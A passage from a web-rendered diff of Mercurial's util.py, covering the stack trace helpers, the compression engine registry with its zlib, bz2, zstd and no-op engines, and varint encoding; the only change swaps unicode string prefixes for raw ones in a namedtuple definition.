3128 3128 Skips the 'skip' last entries, then return the last 'depth' entries.
3129 3129 Each file+linenumber is formatted according to fileline.
3130 3130 Each line is formatted according to line.
3131 3131 If line is None, it yields:
3132 3132 length of longest filepath+line number,
3133 3133 filepath+linenumber,
3134 3134 function
3135 3135
3136 3136 Not be used in production code but very convenient while developing.
3137 3137 '''
3138 3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3139 3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3140 3140 ][-depth:]
3141 3141 if entries:
3142 3142 fnmax = max(len(entry[0]) for entry in entries)
3143 3143 for fnln, func in entries:
3144 3144 if line is None:
3145 3145 yield (fnmax, fnln, func)
3146 3146 else:
3147 3147 yield line % (fnmax, fnln, func)
3148 3148
3149 3149 def debugstacktrace(msg='stacktrace', skip=0,
3150 3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3151 3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3152 3152 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3153 3153 By default it will flush stdout first.
3154 3154 It can be used everywhere and intentionally does not require an ui object.
3155 3155 Not be used in production code but very convenient while developing.
3156 3156 '''
3157 3157 if otherf:
3158 3158 otherf.flush()
3159 3159 f.write('%s at:\n' % msg.rstrip())
3160 3160 for line in getstackframes(skip + 1, depth=depth):
3161 3161 f.write(line)
3162 3162 f.flush()
3163 3163
3164 3164 class dirs(object):
3165 3165 '''a multiset of directory names from a dirstate or manifest'''
3166 3166
3167 3167 def __init__(self, map, skip=None):
3168 3168 self._dirs = {}
3169 3169 addpath = self.addpath
3170 3170 if safehasattr(map, 'iteritems') and skip is not None:
3171 3171 for f, s in map.iteritems():
3172 3172 if s[0] != skip:
3173 3173 addpath(f)
3174 3174 else:
3175 3175 for f in map:
3176 3176 addpath(f)
3177 3177
3178 3178 def addpath(self, path):
3179 3179 dirs = self._dirs
3180 3180 for base in finddirs(path):
3181 3181 if base in dirs:
3182 3182 dirs[base] += 1
3183 3183 return
3184 3184 dirs[base] = 1
3185 3185
3186 3186 def delpath(self, path):
3187 3187 dirs = self._dirs
3188 3188 for base in finddirs(path):
3189 3189 if dirs[base] > 1:
3190 3190 dirs[base] -= 1
3191 3191 return
3192 3192 del dirs[base]
3193 3193
3194 3194 def __iter__(self):
3195 3195 return iter(self._dirs)
3196 3196
3197 3197 def __contains__(self, d):
3198 3198 return d in self._dirs
3199 3199
3200 3200 if safehasattr(parsers, 'dirs'):
3201 3201 dirs = parsers.dirs
3202 3202
3203 3203 def finddirs(path):
3204 3204 pos = path.rfind('/')
3205 3205 while pos != -1:
3206 3206 yield path[:pos]
3207 3207 pos = path.rfind('/', 0, pos)
3208 3208
3209 3209 # compression code
3210 3210
3211 3211 SERVERROLE = 'server'
3212 3212 CLIENTROLE = 'client'
3213 3213
3214 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3215 (u'name', u'serverpriority',
3216 u'clientpriority'))
3214 compewireprotosupport = collections.namedtuple(r'compenginewireprotosupport',
3215 (r'name', r'serverpriority',
3216 r'clientpriority'))
3217 3217
3218 3218 class compressormanager(object):
3219 3219 """Holds registrations of various compression engines.
3220 3220
3221 3221 This class essentially abstracts the differences between compression
3222 3222 engines to allow new compression formats to be added easily, possibly from
3223 3223 extensions.
3224 3224
3225 3225 Compressors are registered against the global instance by calling its
3226 3226 ``register()`` method.
3227 3227 """
3228 3228 def __init__(self):
3229 3229 self._engines = {}
3230 3230 # Bundle spec human name to engine name.
3231 3231 self._bundlenames = {}
3232 3232 # Internal bundle identifier to engine name.
3233 3233 self._bundletypes = {}
3234 3234 # Revlog header to engine name.
3235 3235 self._revlogheaders = {}
3236 3236 # Wire proto identifier to engine name.
3237 3237 self._wiretypes = {}
3238 3238
3239 3239 def __getitem__(self, key):
3240 3240 return self._engines[key]
3241 3241
3242 3242 def __contains__(self, key):
3243 3243 return key in self._engines
3244 3244
3245 3245 def __iter__(self):
3246 3246 return iter(self._engines.keys())
3247 3247
3248 3248 def register(self, engine):
3249 3249 """Register a compression engine with the manager.
3250 3250
3251 3251 The argument must be a ``compressionengine`` instance.
3252 3252 """
3253 3253 if not isinstance(engine, compressionengine):
3254 3254 raise ValueError(_('argument must be a compressionengine'))
3255 3255
3256 3256 name = engine.name()
3257 3257
3258 3258 if name in self._engines:
3259 3259 raise error.Abort(_('compression engine %s already registered') %
3260 3260 name)
3261 3261
3262 3262 bundleinfo = engine.bundletype()
3263 3263 if bundleinfo:
3264 3264 bundlename, bundletype = bundleinfo
3265 3265
3266 3266 if bundlename in self._bundlenames:
3267 3267 raise error.Abort(_('bundle name %s already registered') %
3268 3268 bundlename)
3269 3269 if bundletype in self._bundletypes:
3270 3270 raise error.Abort(_('bundle type %s already registered by %s') %
3271 3271 (bundletype, self._bundletypes[bundletype]))
3272 3272
3273 3273 # No external facing name declared.
3274 3274 if bundlename:
3275 3275 self._bundlenames[bundlename] = name
3276 3276
3277 3277 self._bundletypes[bundletype] = name
3278 3278
3279 3279 wiresupport = engine.wireprotosupport()
3280 3280 if wiresupport:
3281 3281 wiretype = wiresupport.name
3282 3282 if wiretype in self._wiretypes:
3283 3283 raise error.Abort(_('wire protocol compression %s already '
3284 3284 'registered by %s') %
3285 3285 (wiretype, self._wiretypes[wiretype]))
3286 3286
3287 3287 self._wiretypes[wiretype] = name
3288 3288
3289 3289 revlogheader = engine.revlogheader()
3290 3290 if revlogheader and revlogheader in self._revlogheaders:
3291 3291 raise error.Abort(_('revlog header %s already registered by %s') %
3292 3292 (revlogheader, self._revlogheaders[revlogheader]))
3293 3293
3294 3294 if revlogheader:
3295 3295 self._revlogheaders[revlogheader] = name
3296 3296
3297 3297 self._engines[name] = engine
3298 3298
3299 3299 @property
3300 3300 def supportedbundlenames(self):
3301 3301 return set(self._bundlenames.keys())
3302 3302
3303 3303 @property
3304 3304 def supportedbundletypes(self):
3305 3305 return set(self._bundletypes.keys())
3306 3306
3307 3307 def forbundlename(self, bundlename):
3308 3308 """Obtain a compression engine registered to a bundle name.
3309 3309
3310 3310 Will raise KeyError if the bundle type isn't registered.
3311 3311
3312 3312 Will abort if the engine is known but not available.
3313 3313 """
3314 3314 engine = self._engines[self._bundlenames[bundlename]]
3315 3315 if not engine.available():
3316 3316 raise error.Abort(_('compression engine %s could not be loaded') %
3317 3317 engine.name())
3318 3318 return engine
3319 3319
3320 3320 def forbundletype(self, bundletype):
3321 3321 """Obtain a compression engine registered to a bundle type.
3322 3322
3323 3323 Will raise KeyError if the bundle type isn't registered.
3324 3324
3325 3325 Will abort if the engine is known but not available.
3326 3326 """
3327 3327 engine = self._engines[self._bundletypes[bundletype]]
3328 3328 if not engine.available():
3329 3329 raise error.Abort(_('compression engine %s could not be loaded') %
3330 3330 engine.name())
3331 3331 return engine
3332 3332
3333 3333 def supportedwireengines(self, role, onlyavailable=True):
3334 3334 """Obtain compression engines that support the wire protocol.
3335 3335
3336 3336 Returns a list of engines in prioritized order, most desired first.
3337 3337
3338 3338 If ``onlyavailable`` is set, filter out engines that can't be
3339 3339 loaded.
3340 3340 """
3341 3341 assert role in (SERVERROLE, CLIENTROLE)
3342 3342
3343 3343 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3344 3344
3345 3345 engines = [self._engines[e] for e in self._wiretypes.values()]
3346 3346 if onlyavailable:
3347 3347 engines = [e for e in engines if e.available()]
3348 3348
3349 3349 def getkey(e):
3350 3350 # Sort first by priority, highest first. In case of tie, sort
3351 3351 # alphabetically. This is arbitrary, but ensures output is
3352 3352 # stable.
3353 3353 w = e.wireprotosupport()
3354 3354 return -1 * getattr(w, attr), w.name
3355 3355
3356 3356 return list(sorted(engines, key=getkey))
3357 3357
3358 3358 def forwiretype(self, wiretype):
3359 3359 engine = self._engines[self._wiretypes[wiretype]]
3360 3360 if not engine.available():
3361 3361 raise error.Abort(_('compression engine %s could not be loaded') %
3362 3362 engine.name())
3363 3363 return engine
3364 3364
3365 3365 def forrevlogheader(self, header):
3366 3366 """Obtain a compression engine registered to a revlog header.
3367 3367
3368 3368 Will raise KeyError if the revlog header value isn't registered.
3369 3369 """
3370 3370 return self._engines[self._revlogheaders[header]]
3371 3371
3372 3372 compengines = compressormanager()
3373 3373
3374 3374 class compressionengine(object):
3375 3375 """Base class for compression engines.
3376 3376
3377 3377 Compression engines must implement the interface defined by this class.
3378 3378 """
3379 3379 def name(self):
3380 3380 """Returns the name of the compression engine.
3381 3381
3382 3382 This is the key the engine is registered under.
3383 3383
3384 3384 This method must be implemented.
3385 3385 """
3386 3386 raise NotImplementedError()
3387 3387
3388 3388 def available(self):
3389 3389 """Whether the compression engine is available.
3390 3390
3391 3391 The intent of this method is to allow optional compression engines
3392 3392 that may not be available in all installations (such as engines relying
3393 3393 on C extensions that may not be present).
3394 3394 """
3395 3395 return True
3396 3396
3397 3397 def bundletype(self):
3398 3398 """Describes bundle identifiers for this engine.
3399 3399
3400 3400 If this compression engine isn't supported for bundles, returns None.
3401 3401
3402 3402 If this engine can be used for bundles, returns a 2-tuple of strings of
3403 3403 the user-facing "bundle spec" compression name and an internal
3404 3404 identifier used to denote the compression format within bundles. To
3405 3405 exclude the name from external usage, set the first element to ``None``.
3406 3406
3407 3407 If bundle compression is supported, the class must also implement
3408 3408 ``compressstream`` and `decompressorreader``.
3409 3409
3410 3410 The docstring of this method is used in the help system to tell users
3411 3411 about this engine.
3412 3412 """
3413 3413 return None
3414 3414
3415 3415 def wireprotosupport(self):
3416 3416 """Declare support for this compression format on the wire protocol.
3417 3417
3418 3418 If this compression engine isn't supported for compressing wire
3419 3419 protocol payloads, returns None.
3420 3420
3421 3421 Otherwise, returns ``compenginewireprotosupport`` with the following
3422 3422 fields:
3423 3423
3424 3424 * String format identifier
3425 3425 * Integer priority for the server
3426 3426 * Integer priority for the client
3427 3427
3428 3428 The integer priorities are used to order the advertisement of format
3429 3429 support by server and client. The highest integer is advertised
3430 3430 first. Integers with non-positive values aren't advertised.
3431 3431
3432 3432 The priority values are somewhat arbitrary and only used for default
3433 3433 ordering. The relative order can be changed via config options.
3434 3434
3435 3435 If wire protocol compression is supported, the class must also implement
3436 3436 ``compressstream`` and ``decompressorreader``.
3437 3437 """
3438 3438 return None
3439 3439
3440 3440 def revlogheader(self):
3441 3441 """Header added to revlog chunks that identifies this engine.
3442 3442
3443 3443 If this engine can be used to compress revlogs, this method should
3444 3444 return the bytes used to identify chunks compressed with this engine.
3445 3445 Else, the method should return ``None`` to indicate it does not
3446 3446 participate in revlog compression.
3447 3447 """
3448 3448 return None
3449 3449
3450 3450 def compressstream(self, it, opts=None):
3451 3451 """Compress an iterator of chunks.
3452 3452
3453 3453 The method receives an iterator (ideally a generator) of chunks of
3454 3454 bytes to be compressed. It returns an iterator (ideally a generator)
3455 3455 of bytes of chunks representing the compressed output.
3456 3456
3457 3457 Optionally accepts an argument defining how to perform compression.
3458 3458 Each engine treats this argument differently.
3459 3459 """
3460 3460 raise NotImplementedError()
3461 3461
3462 3462 def decompressorreader(self, fh):
3463 3463 """Perform decompression on a file object.
3464 3464
3465 3465 Argument is an object with a ``read(size)`` method that returns
3466 3466 compressed data. Return value is an object with a ``read(size)`` that
3467 3467 returns uncompressed data.
3468 3468 """
3469 3469 raise NotImplementedError()
3470 3470
3471 3471 def revlogcompressor(self, opts=None):
3472 3472 """Obtain an object that can be used to compress revlog entries.
3473 3473
3474 3474 The object has a ``compress(data)`` method that compresses binary
3475 3475 data. This method returns compressed binary data or ``None`` if
3476 3476 the data could not be compressed (too small, not compressible, etc).
3477 3477 The returned data should have a header uniquely identifying this
3478 3478 compression format so decompression can be routed to this engine.
3479 3479 This header should be identified by the ``revlogheader()`` return
3480 3480 value.
3481 3481
3482 3482 The object has a ``decompress(data)`` method that decompresses
3483 3483 data. The method will only be called if ``data`` begins with
3484 3484 ``revlogheader()``. The method should return the raw, uncompressed
3485 3485 data or raise a ``StorageError``.
3486 3486
3487 3487 The object is reusable but is not thread safe.
3488 3488 """
3489 3489 raise NotImplementedError()
3490 3490
3491 3491 class _CompressedStreamReader(object):
3492 3492 def __init__(self, fh):
3493 3493 if safehasattr(fh, 'unbufferedread'):
3494 3494 self._reader = fh.unbufferedread
3495 3495 else:
3496 3496 self._reader = fh.read
3497 3497 self._pending = []
3498 3498 self._pos = 0
3499 3499 self._eof = False
3500 3500
3501 3501 def _decompress(self, chunk):
3502 3502 raise NotImplementedError()
3503 3503
3504 3504 def read(self, l):
3505 3505 buf = []
3506 3506 while True:
3507 3507 while self._pending:
3508 3508 if len(self._pending[0]) > l + self._pos:
3509 3509 newbuf = self._pending[0]
3510 3510 buf.append(newbuf[self._pos:self._pos + l])
3511 3511 self._pos += l
3512 3512 return ''.join(buf)
3513 3513
3514 3514 newbuf = self._pending.pop(0)
3515 3515 if self._pos:
3516 3516 buf.append(newbuf[self._pos:])
3517 3517 l -= len(newbuf) - self._pos
3518 3518 else:
3519 3519 buf.append(newbuf)
3520 3520 l -= len(newbuf)
3521 3521 self._pos = 0
3522 3522
3523 3523 if self._eof:
3524 3524 return ''.join(buf)
3525 3525 chunk = self._reader(65536)
3526 3526 self._decompress(chunk)
3527 3527 if not chunk and not self._pending and not self._eof:
3528 3528 # No progress and no new data, bail out
3529 3529 return ''.join(buf)
3530 3530
3531 3531 class _GzipCompressedStreamReader(_CompressedStreamReader):
3532 3532 def __init__(self, fh):
3533 3533 super(_GzipCompressedStreamReader, self).__init__(fh)
3534 3534 self._decompobj = zlib.decompressobj()
3535 3535 def _decompress(self, chunk):
3536 3536 newbuf = self._decompobj.decompress(chunk)
3537 3537 if newbuf:
3538 3538 self._pending.append(newbuf)
3539 3539 d = self._decompobj.copy()
3540 3540 try:
3541 3541 d.decompress('x')
3542 3542 d.flush()
3543 3543 if d.unused_data == 'x':
3544 3544 self._eof = True
3545 3545 except zlib.error:
3546 3546 pass
3547 3547
3548 3548 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3549 3549 def __init__(self, fh):
3550 3550 super(_BZ2CompressedStreamReader, self).__init__(fh)
3551 3551 self._decompobj = bz2.BZ2Decompressor()
3552 3552 def _decompress(self, chunk):
3553 3553 newbuf = self._decompobj.decompress(chunk)
3554 3554 if newbuf:
3555 3555 self._pending.append(newbuf)
3556 3556 try:
3557 3557 while True:
3558 3558 newbuf = self._decompobj.decompress('')
3559 3559 if newbuf:
3560 3560 self._pending.append(newbuf)
3561 3561 else:
3562 3562 break
3563 3563 except EOFError:
3564 3564 self._eof = True
3565 3565
3566 3566 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3567 3567 def __init__(self, fh):
3568 3568 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3569 3569 newbuf = self._decompobj.decompress('BZ')
3570 3570 if newbuf:
3571 3571 self._pending.append(newbuf)
3572 3572
3573 3573 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3574 3574 def __init__(self, fh, zstd):
3575 3575 super(_ZstdCompressedStreamReader, self).__init__(fh)
3576 3576 self._zstd = zstd
3577 3577 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3578 3578 def _decompress(self, chunk):
3579 3579 newbuf = self._decompobj.decompress(chunk)
3580 3580 if newbuf:
3581 3581 self._pending.append(newbuf)
3582 3582 try:
3583 3583 while True:
3584 3584 newbuf = self._decompobj.decompress('')
3585 3585 if newbuf:
3586 3586 self._pending.append(newbuf)
3587 3587 else:
3588 3588 break
3589 3589 except self._zstd.ZstdError:
3590 3590 self._eof = True
3591 3591
3592 3592 class _zlibengine(compressionengine):
3593 3593 def name(self):
3594 3594 return 'zlib'
3595 3595
3596 3596 def bundletype(self):
3597 3597 """zlib compression using the DEFLATE algorithm.
3598 3598
3599 3599 All Mercurial clients should support this format. The compression
3600 3600 algorithm strikes a reasonable balance between compression ratio
3601 3601 and size.
3602 3602 """
3603 3603 return 'gzip', 'GZ'
3604 3604
3605 3605 def wireprotosupport(self):
3606 3606 return compewireprotosupport('zlib', 20, 20)
3607 3607
3608 3608 def revlogheader(self):
3609 3609 return 'x'
3610 3610
3611 3611 def compressstream(self, it, opts=None):
3612 3612 opts = opts or {}
3613 3613
3614 3614 z = zlib.compressobj(opts.get('level', -1))
3615 3615 for chunk in it:
3616 3616 data = z.compress(chunk)
3617 3617 # Not all calls to compress emit data. It is cheaper to inspect
3618 3618 # here than to feed empty chunks through generator.
3619 3619 if data:
3620 3620 yield data
3621 3621
3622 3622 yield z.flush()
3623 3623
3624 3624 def decompressorreader(self, fh):
3625 3625 return _GzipCompressedStreamReader(fh)
3626 3626
3627 3627 class zlibrevlogcompressor(object):
3628 3628 def compress(self, data):
3629 3629 insize = len(data)
3630 3630 # Caller handles empty input case.
3631 3631 assert insize > 0
3632 3632
3633 3633 if insize < 44:
3634 3634 return None
3635 3635
3636 3636 elif insize <= 1000000:
3637 3637 compressed = zlib.compress(data)
3638 3638 if len(compressed) < insize:
3639 3639 return compressed
3640 3640 return None
3641 3641
3642 3642 # zlib makes an internal copy of the input buffer, doubling
3643 3643 # memory usage for large inputs. So do streaming compression
3644 3644 # on large inputs.
3645 3645 else:
3646 3646 z = zlib.compressobj()
3647 3647 parts = []
3648 3648 pos = 0
3649 3649 while pos < insize:
3650 3650 pos2 = pos + 2**20
3651 3651 parts.append(z.compress(data[pos:pos2]))
3652 3652 pos = pos2
3653 3653 parts.append(z.flush())
3654 3654
3655 3655 if sum(map(len, parts)) < insize:
3656 3656 return ''.join(parts)
3657 3657 return None
3658 3658
3659 3659 def decompress(self, data):
3660 3660 try:
3661 3661 return zlib.decompress(data)
3662 3662 except zlib.error as e:
3663 3663 raise error.StorageError(_('revlog decompress error: %s') %
3664 3664 stringutil.forcebytestr(e))
3665 3665
3666 3666 def revlogcompressor(self, opts=None):
3667 3667 return self.zlibrevlogcompressor()
3668 3668
3669 3669 compengines.register(_zlibengine())
3670 3670
3671 3671 class _bz2engine(compressionengine):
3672 3672 def name(self):
3673 3673 return 'bz2'
3674 3674
3675 3675 def bundletype(self):
3676 3676 """An algorithm that produces smaller bundles than ``gzip``.
3677 3677
3678 3678 All Mercurial clients should support this format.
3679 3679
3680 3680 This engine will likely produce smaller bundles than ``gzip`` but
3681 3681 will be significantly slower, both during compression and
3682 3682 decompression.
3683 3683
3684 3684 If available, the ``zstd`` engine can yield similar or better
3685 3685 compression at much higher speeds.
3686 3686 """
3687 3687 return 'bzip2', 'BZ'
3688 3688
3689 3689 # We declare a protocol name but don't advertise by default because
3690 3690 # it is slow.
3691 3691 def wireprotosupport(self):
3692 3692 return compewireprotosupport('bzip2', 0, 0)
3693 3693
3694 3694 def compressstream(self, it, opts=None):
3695 3695 opts = opts or {}
3696 3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3697 3697 for chunk in it:
3698 3698 data = z.compress(chunk)
3699 3699 if data:
3700 3700 yield data
3701 3701
3702 3702 yield z.flush()
3703 3703
3704 3704 def decompressorreader(self, fh):
3705 3705 return _BZ2CompressedStreamReader(fh)
3706 3706
3707 3707 compengines.register(_bz2engine())
3708 3708
3709 3709 class _truncatedbz2engine(compressionengine):
3710 3710 def name(self):
3711 3711 return 'bz2truncated'
3712 3712
3713 3713 def bundletype(self):
3714 3714 return None, '_truncatedBZ'
3715 3715
3716 3716 # We don't implement compressstream because it is hackily handled elsewhere.
3717 3717
3718 3718 def decompressorreader(self, fh):
3719 3719 return _TruncatedBZ2CompressedStreamReader(fh)
3720 3720
3721 3721 compengines.register(_truncatedbz2engine())
3722 3722
3723 3723 class _noopengine(compressionengine):
3724 3724 def name(self):
3725 3725 return 'none'
3726 3726
3727 3727 def bundletype(self):
3728 3728 """No compression is performed.
3729 3729
3730 3730 Use this compression engine to explicitly disable compression.
3731 3731 """
3732 3732 return 'none', 'UN'
3733 3733
3734 3734 # Clients always support uncompressed payloads. Servers don't because
3735 3735 # unless you are on a fast network, uncompressed payloads can easily
3736 3736 # saturate your network pipe.
3737 3737 def wireprotosupport(self):
3738 3738 return compewireprotosupport('none', 0, 10)
3739 3739
3740 3740 # We don't implement revlogheader because it is handled specially
3741 3741 # in the revlog class.
3742 3742
3743 3743 def compressstream(self, it, opts=None):
3744 3744 return it
3745 3745
3746 3746 def decompressorreader(self, fh):
3747 3747 return fh
3748 3748
3749 3749 class nooprevlogcompressor(object):
3750 3750 def compress(self, data):
3751 3751 return None
3752 3752
3753 3753 def revlogcompressor(self, opts=None):
3754 3754 return self.nooprevlogcompressor()
3755 3755
3756 3756 compengines.register(_noopengine())
3757 3757
3758 3758 class _zstdengine(compressionengine):
3759 3759 def name(self):
3760 3760 return 'zstd'
3761 3761
3762 3762 @propertycache
3763 3763 def _module(self):
3764 3764 # Not all installs have the zstd module available. So defer importing
3765 3765 # until first access.
3766 3766 try:
3767 3767 from . import zstd
3768 3768 # Force delayed import.
3769 3769 zstd.__version__
3770 3770 return zstd
3771 3771 except ImportError:
3772 3772 return None
3773 3773
3774 3774 def available(self):
3775 3775 return bool(self._module)
3776 3776
3777 3777 def bundletype(self):
3778 3778 """A modern compression algorithm that is fast and highly flexible.
3779 3779
3780 3780 Only supported by Mercurial 4.1 and newer clients.
3781 3781
3782 3782 With the default settings, zstd compression is both faster and yields
3783 3783 better compression than ``gzip``. It also frequently yields better
3784 3784 compression than ``bzip2`` while operating at much higher speeds.
3785 3785
3786 3786 If this engine is available and backwards compatibility is not a
3787 3787 concern, it is likely the best available engine.
3788 3788 """
3789 3789 return 'zstd', 'ZS'
3790 3790
3791 3791 def wireprotosupport(self):
3792 3792 return compewireprotosupport('zstd', 50, 50)
3793 3793
3794 3794 def revlogheader(self):
3795 3795 return '\x28'
3796 3796
3797 3797 def compressstream(self, it, opts=None):
3798 3798 opts = opts or {}
3799 3799 # zstd level 3 is almost always significantly faster than zlib
3800 3800 # while providing no worse compression. It strikes a good balance
3801 3801 # between speed and compression.
3802 3802 level = opts.get('level', 3)
3803 3803
3804 3804 zstd = self._module
3805 3805 z = zstd.ZstdCompressor(level=level).compressobj()
3806 3806 for chunk in it:
3807 3807 data = z.compress(chunk)
3808 3808 if data:
3809 3809 yield data
3810 3810
3811 3811 yield z.flush()
3812 3812
3813 3813 def decompressorreader(self, fh):
3814 3814 return _ZstdCompressedStreamReader(fh, self._module)
3815 3815
3816 3816 class zstdrevlogcompressor(object):
3817 3817 def __init__(self, zstd, level=3):
3818 3818 # TODO consider omitting frame magic to save 4 bytes.
3819 3819 # This writes content sizes into the frame header. That is
3820 3820 # extra storage. But it allows a correct size memory allocation
3821 3821 # to hold the result.
3822 3822 self._cctx = zstd.ZstdCompressor(level=level)
3823 3823 self._dctx = zstd.ZstdDecompressor()
3824 3824 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3825 3825 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3826 3826
3827 3827 def compress(self, data):
3828 3828 insize = len(data)
3829 3829 # Caller handles empty input case.
3830 3830 assert insize > 0
3831 3831
3832 3832 if insize < 50:
3833 3833 return None
3834 3834
3835 3835 elif insize <= 1000000:
3836 3836 compressed = self._cctx.compress(data)
3837 3837 if len(compressed) < insize:
3838 3838 return compressed
3839 3839 return None
3840 3840 else:
3841 3841 z = self._cctx.compressobj()
3842 3842 chunks = []
3843 3843 pos = 0
3844 3844 while pos < insize:
3845 3845 pos2 = pos + self._compinsize
3846 3846 chunk = z.compress(data[pos:pos2])
3847 3847 if chunk:
3848 3848 chunks.append(chunk)
3849 3849 pos = pos2
3850 3850 chunks.append(z.flush())
3851 3851
3852 3852 if sum(map(len, chunks)) < insize:
3853 3853 return ''.join(chunks)
3854 3854 return None
3855 3855
3856 3856 def decompress(self, data):
3857 3857 insize = len(data)
3858 3858
3859 3859 try:
3860 3860 # This was measured to be faster than other streaming
3861 3861 # decompressors.
3862 3862 dobj = self._dctx.decompressobj()
3863 3863 chunks = []
3864 3864 pos = 0
3865 3865 while pos < insize:
3866 3866 pos2 = pos + self._decompinsize
3867 3867 chunk = dobj.decompress(data[pos:pos2])
3868 3868 if chunk:
3869 3869 chunks.append(chunk)
3870 3870 pos = pos2
3871 3871 # Frame should be exhausted, so no finish() API.
3872 3872
3873 3873 return ''.join(chunks)
3874 3874 except Exception as e:
3875 3875 raise error.StorageError(_('revlog decompress error: %s') %
3876 3876 stringutil.forcebytestr(e))
3877 3877
3878 3878 def revlogcompressor(self, opts=None):
3879 3879 opts = opts or {}
3880 3880 return self.zstdrevlogcompressor(self._module,
3881 3881 level=opts.get('level', 3))
3882 3882
3883 3883 compengines.register(_zstdengine())
3884 3884
3885 3885 def bundlecompressiontopics():
3886 3886 """Obtains a list of available bundle compressions for use in help."""
3887 3887 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3888 3888 items = {}
3889 3889
3890 3890 # We need to format the docstring. So use a dummy object/type to hold it
3891 3891 # rather than mutating the original.
3892 3892 class docobject(object):
3893 3893 pass
3894 3894
3895 3895 for name in compengines:
3896 3896 engine = compengines[name]
3897 3897
3898 3898 if not engine.available():
3899 3899 continue
3900 3900
3901 3901 bt = engine.bundletype()
3902 3902 if not bt or not bt[0]:
3903 3903 continue
3904 3904
3905 3905 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3906 3906
3907 3907 value = docobject()
3908 3908 value.__doc__ = pycompat.sysstr(doc)
3909 3909 value._origdoc = engine.bundletype.__doc__
3910 3910 value._origfunc = engine.bundletype
3911 3911
3912 3912 items[bt[0]] = value
3913 3913
3914 3914 return items
3915 3915
3916 3916 i18nfunctions = bundlecompressiontopics().values()
3917 3917
3918 3918 # convenient shortcut
3919 3919 dst = debugstacktrace
3920 3920
3921 3921 def safename(f, tag, ctx, others=None):
3922 3922 """
3923 3923 Generate a name that it is safe to rename f to in the given context.
3924 3924
3925 3925 f: filename to rename
3926 3926 tag: a string tag that will be included in the new name
3927 3927 ctx: a context, in which the new name must not exist
3928 3928 others: a set of other filenames that the new name must not be in
3929 3929
3930 3930 Returns a file name of the form oldname~tag[~number] which does not exist
3931 3931 in the provided context and is not in the set of other names.
3932 3932 """
3933 3933 if others is None:
3934 3934 others = set()
3935 3935
3936 3936 fn = '%s~%s' % (f, tag)
3937 3937 if fn not in ctx and fn not in others:
3938 3938 return fn
3939 3939 for n in itertools.count(1):
3940 3940 fn = '%s~%s~%s' % (f, tag, n)
3941 3941 if fn not in ctx and fn not in others:
3942 3942 return fn
3943 3943
3944 3944 def readexactly(stream, n):
3945 3945 '''read n bytes from stream.read and abort if less was available'''
3946 3946 s = stream.read(n)
3947 3947 if len(s) < n:
3948 3948 raise error.Abort(_("stream ended unexpectedly"
3949 3949 " (got %d bytes, expected %d)")
3950 3950 % (len(s), n))
3951 3951 return s
3952 3952
3953 3953 def uvarintencode(value):
3954 3954 """Encode an unsigned integer value to a varint.
3955 3955
3956 3956 A varint is a variable length integer of 1 or more bytes. Each byte
3957 3957 except the last has the most significant bit set. The lower 7 bits of
3958 3958 each byte store the 2's complement representation, least significant group
3959 3959 first.
3960 3960
3961 3961 >>> uvarintencode(0)
3962 3962 '\\x00'
3963 3963 >>> uvarintencode(1)
3964 3964 '\\x01'
3965 3965 >>> uvarintencode(127)
3966 3966 '\\x7f'
3967 3967 >>> uvarintencode(1337)
3968 3968 '\\xb9\\n'
3969 3969 >>> uvarintencode(65536)
3970 3970 '\\x80\\x80\\x04'
3971 3971 >>> uvarintencode(-1)
3972 3972 Traceback (most recent call last):
3973 3973 ...
3974 3974 ProgrammingError: negative value for uvarint: -1
3975 3975 """
3976 3976 if value < 0:
3977 3977 raise error.ProgrammingError('negative value for uvarint: %d'
3978 3978 % value)
3979 3979 bits = value & 0x7f
3980 3980 value >>= 7
3981 3981 bytes = []
3982 3982 while value:
3983 3983 bytes.append(pycompat.bytechr(0x80 | bits))
3984 3984 bits = value & 0x7f
3985 3985 value >>= 7
3986 3986 bytes.append(pycompat.bytechr(bits))
3987 3987
3988 3988 return ''.join(bytes)
3989 3989
3990 3990 def uvarintdecodestream(fh):
3991 3991 """Decode an unsigned variable length integer from a stream.
3992 3992
3993 3993 The passed argument is anything that has a ``.read(N)`` method.
3994 3994
3995 3995 >>> try:
3996 3996 ... from StringIO import StringIO as BytesIO
3997 3997 ... except ImportError:
3998 3998 ... from io import BytesIO
3999 3999 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4000 4000 0
4001 4001 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4002 4002 1
4003 4003 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4004 4004 127
4005 4005 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4006 4006 1337
4007 4007 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4008 4008 65536
4009 4009 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4010 4010 Traceback (most recent call last):
4011 4011 ...
4012 4012 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4013 4013 """
4014 4014 result = 0
4015 4015 shift = 0
4016 4016 while True:
4017 4017 byte = ord(readexactly(fh, 1))
4018 4018 result |= ((byte & 0x7f) << shift)
4019 4019 if not (byte & 0x80):
4020 4020 return result
4021 4021 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now